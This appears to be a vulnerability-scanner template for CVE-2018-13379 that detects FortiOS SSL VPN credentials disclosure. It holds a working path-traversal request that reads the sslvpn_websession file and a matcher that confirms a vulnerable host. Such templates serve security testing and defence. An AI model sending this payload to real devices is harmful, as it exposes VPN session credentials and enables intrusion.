id: cve-2018-13379
info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
words:
- "var fgt_lang ="